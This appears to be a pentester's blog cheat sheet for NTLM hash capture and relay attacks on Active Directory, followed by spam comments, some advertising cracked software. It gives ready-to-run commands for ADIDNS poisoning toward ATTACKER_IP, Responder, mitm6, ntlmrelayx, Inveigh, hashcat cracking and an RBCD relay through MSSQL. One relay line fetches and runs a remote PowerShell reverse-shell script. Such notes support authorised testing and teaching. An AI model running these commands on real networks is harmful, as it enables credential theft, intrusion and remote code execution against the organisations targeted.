Hash | Hashcat | Attack method |
---|---|---|
LM | 3000 | crack/pass the hash |
NTLM/NTHash | 1000 | crack/pass the hash |
NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack |
NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack |
Abusing ADIDNS to Send traffic to the target
#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose
#assign permissions to the ADIDNS PowershellGrant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
Capturing Hashes using responder and cracking hashes
#Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder
sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat
hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force
Mitm6 & NTLMRelayx #start MITM6 and assign IPV6 DNS Address to hosts mitm6 -d victim.domain #start ntmrelay ntlmrelayx.py -wh Attacker_IP -t smb://VICTIM_IP/ -i
NTLM relay of ADWS (WCF) connections
This attack works only when a connection is initiated from the target machine.
#Start
ntlmrelayx.py --no-smb-server --no-http-server -t rpc://TARGET_IP-c "echo a > c:\test"
#Simulate the vuln
get-aduser -filter * -server <pentester_machine>
#Capture and view the traffic in wireshark
socat TCP-LISTEN:9389,fork,reuseaddr TCP:DC_IP:9389
Relaying using ntlmrelayx
# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory
# -c: execute the command
# -e: execute a binary
ntlmrelayx can automatically dump hashes, when it can access an administrator account.
so, lookout for the hashes in the output. Also Impacket 0.9.23-dev version has issues with ntlmrelay. better use the stable version.
sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support
Useful commands
sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support
sudo proxychains ntlmrelayx.py -t smb://10.10.10.10 -l loot -i -smb2support -c "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.102:8000/powerrev.ps1')"
#Target a specific user on a specific target
sudo proxychains ntlmrelayx.py -t smb://USERNAME@192.168.2.1 -smb2support
Inveigh
Inveigh does not support SMB-auth, so prefer ntlmrelayx
Import-Module .\Inveigh.ps1
#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo
#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)
Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSCredential $Cred -ADIDNSDomain 192.168.2.10
Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController 192.168.2.10
#Capturing Hashes on the target
Invoke-Inveigh -ConsoleOutput Y -DNS Y
#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.21.155 -ShowHelp N -StatusOutput N -Command "powershell.exe -c whoami"
Resource based Constraint Delegation Attack on MSSQL Server
More Info Here
#add a DNS entry to attacker machine
Invoke-DNSUpdate -DNSType A -DNSName shit -DNSData 10.10.10.10
#run the command on sql server which has xp_dirtree stored procedure
SQLCMD -S SERVER\username -Q "exec master.dbo.xp_dirtree '\\shit\a'" -U Admin -P password
proxychains python rbcd_relay.py SQLServer_IP steins.local server$ Other_User
I am very impressed with your post because this post is very beneficial for me and provide a new knowledge to me
ReplyDeleteMovement Output Crack
My response on my own website. Appreciation is a wonderful thing...thanks for sharing keep it up. Output Movement Crack
ReplyDeleteAny content inclusive to all is the best content. With Acadecraft’s digital accessibility solutions, clients can get the best accessibility services. From accessibility audits to accessibility remediation services, we provide all. Our accessibility experts ensure to check everything minutely. From the alt-texts to the color contrast, the experts take care of all!
ReplyDeleteAlso Read: mobile learning companies